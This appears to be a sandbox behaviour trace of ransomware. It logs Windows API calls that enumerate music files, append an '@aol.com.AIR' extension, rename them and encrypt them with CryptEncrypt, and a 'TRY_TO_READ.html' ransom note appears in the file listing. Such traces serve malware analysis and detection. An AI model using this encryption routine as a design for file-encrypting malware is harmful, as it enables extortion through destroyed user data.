	[0106.753] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3"
	[0106.753] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.753] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\txofxoeigl.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\txofxoeigl.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.756] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\txOFxOeigL.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\txofxoeigl.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540
	[0106.757] GetProcessHeap () returned 0x540000
	[0106.757] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0106.757] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=97018) returned 1
	[0106.757] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17afa
	[0106.757] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.757] GetProcessHeap () returned 0x540000
	[0106.757] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.757] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.757] WriteFile (in: hFile=0x540, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.758] WriteFile (in: hFile=0x540, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.758] WriteFile (in: hFile=0x540, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.758] ReadFile (in: hFile=0x540, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x17afa, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x17afa, lpOverlapped=0x0) returned 1
	[0106.762] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.762] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.762] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav", dwFileAttributes=0x80) returned 1
	[0106.762] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav") returned 71
	[0106.762] GetProcessHeap () returned 0x540000
	[0106.762] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf4) returned 0x57fb28
	[0106.762] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav"
	[0106.762] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.762] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\p8p twc xdnrpm.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\p8p twc xdnrpm.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.764] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\P8P TWc xDnRPm.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\p8p twc xdnrpm.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540
	[0106.764] GetProcessHeap () returned 0x540000
	[0106.764] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.765] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=12934) returned 1
	[0106.765] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3286
	[0106.765] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.765] GetProcessHeap () returned 0x540000
	[0106.765] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.765] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.765] WriteFile (in: hFile=0x540, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.766] WriteFile (in: hFile=0x540, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.766] WriteFile (in: hFile=0x540, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.766] ReadFile (in: hFile=0x540, lpBuffer=0x37b0048, nNumberOfBytesToRead=0x3286, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b0048*, lpNumberOfBytesRead=0x3a1f778*=0x3286, lpOverlapped=0x0) returned 1
	[0106.767] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.767] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.767] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav", dwFileAttributes=0x80) returned 1
	[0106.767] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav") returned 73
	[0106.767] GetProcessHeap () returned 0x540000
	[0106.767] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x598b60
	[0106.767] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav"
	[0106.767] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.767] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\03dccct2oxq2eoxj.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\03dccct2oxq2eoxj.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.770] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m5XQf7IE QfaMBa\\03dCcct2oxq2eoxJ.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m5xqf7ie qfamba\\03dccct2oxq2eoxj.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540
	[0106.770] GetProcessHeap () returned 0x540000
	[0106.770] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.770] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=48075) returned 1
	[0106.770] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xbbcb
	[0106.770] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.770] GetProcessHeap () returned 0x540000
	[0106.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.770] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.770] WriteFile (in: hFile=0x540, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.771] WriteFile (in: hFile=0x540, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.771] WriteFile (in: hFile=0x540, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.776] ReadFile (in: hFile=0x540, lpBuffer=0x37b0048, nNumberOfBytesToRead=0xbbcb, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b0048*, lpNumberOfBytesRead=0x3a1f778*=0xbbcb, lpOverlapped=0x0) returned 1
	[0106.777] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d665cd0, ftCreationTime.dwHighDateTime=0x1d4cb11, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db070
	[0106.777] FindNextFileW (in: hFindFile=0x5db070, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d665cd0, ftCreationTime.dwHighDateTime=0x1d4cb11, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.777] FindNextFileW (in: hFindFile=0x5db070, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e8b2870, ftCreationTime.dwHighDateTime=0x1d4c5a6, ftLastAccessTime.dwLowDateTime=0x8ee004f0, ftLastAccessTime.dwHighDateTime=0x1d4c84d, ftLastWriteTime.dwLowDateTime=0x8ee004f0, ftLastWriteTime.dwHighDateTime=0x1d4c84d, nFileSizeHigh=0x0, nFileSizeLow=0xda65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-DYVd9.m4a", cAlternateFileName="")) returned 1
	[0106.777] FindNextFileW (in: hFindFile=0x5db070, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf5b5710, ftCreationTime.dwHighDateTime=0x1d4c86e, ftLastAccessTime.dwLowDateTime=0xb4633950, ftLastAccessTime.dwHighDateTime=0x1d4c81f, ftLastWriteTime.dwLowDateTime=0xb4633950, ftLastWriteTime.dwHighDateTime=0x1d4c81f, nFileSizeHigh=0x0, nFileSizeLow=0x1291f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3DpaPiomCWDhkF.wav", cAlternateFileName="3DPAPI~1.WAV")) returned 1
	[0106.778] FindNextFileW (in: hFindFile=0x5db070, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ccbb800, ftCreationTime.dwHighDateTime=0x1d4d441, ftLastAccessTime.dwLowDateTime=0x5323c820, ftLastAccessTime.dwHighDateTime=0x1d4c54b, ftLastWriteTime.dwLowDateTime=0x5323c820, ftLastWriteTime.dwHighDateTime=0x1d4c54b, nFileSizeHigh=0x0, nFileSizeLow=0x70a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oaqndsis 8JO.mp3", cAlternateFileName="OAQNDS~1.MP3")) returned 1
	[0106.778] FindNextFileW (in: hFindFile=0x5db070, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe656c330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe656c330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe656c330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.778] FindNextFileW (in: hFindFile=0x5db070, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d164c0, ftCreationTime.dwHighDateTime=0x1d4cf45, ftLastAccessTime.dwLowDateTime=0xc5206080, ftLastAccessTime.dwHighDateTime=0x1d4ccb4, ftLastWriteTime.dwLowDateTime=0xc5206080, ftLastWriteTime.dwHighDateTime=0x1d4ccb4, nFileSizeHigh=0x0, nFileSizeLow=0x14701, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X8dsaK9vXF62hEoyP9Ur.wav", cAlternateFileName="X8DSAK~1.WAV")) returned 1
	[0106.778] FindNextFileW (in: hFindFile=0x5db070, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d164c0, ftCreationTime.dwHighDateTime=0x1d4cf45, ftLastAccessTime.dwLowDateTime=0xc5206080, ftLastAccessTime.dwHighDateTime=0x1d4ccb4, ftLastWriteTime.dwLowDateTime=0xc5206080, ftLastWriteTime.dwHighDateTime=0x1d4ccb4, nFileSizeHigh=0x0, nFileSizeLow=0x14701, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X8dsaK9vXF62hEoyP9Ur.wav", cAlternateFileName="X8DSAK~1.WAV")) returned 0
	[0106.778] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.778] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.778] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav", dwFileAttributes=0x80) returned 1
	[0106.778] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav") returned 74
	[0106.778] GetProcessHeap () returned 0x540000
	[0106.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8670
	[0106.778] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav"
	[0106.778] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.778] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\x8dsak9vxf62heoyp9ur.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\x8dsak9vxf62heoyp9ur.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.790] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\X8dsaK9vXF62hEoyP9Ur.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\x8dsak9vxf62heoyp9ur.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544
	[0106.790] GetProcessHeap () returned 0x540000
	[0106.790] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.790] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=83713) returned 1
	[0106.790] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14701
	[0106.790] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.790] GetProcessHeap () returned 0x540000
	[0106.790] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.790] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.790] WriteFile (in: hFile=0x544, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.791] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.791] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.792] ReadFile (in: hFile=0x544, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x14701, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x14701, lpOverlapped=0x0) returned 1
	[0106.793] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.793] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.793] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3", dwFileAttributes=0x80) returned 1
	[0106.793] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3") returned 66
	[0106.793] GetProcessHeap () returned 0x540000
	[0106.793] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x597dc8
	[0106.793] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3"
	[0106.794] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3.12781717671972518758.ex_parvis@aol.com.AIR"
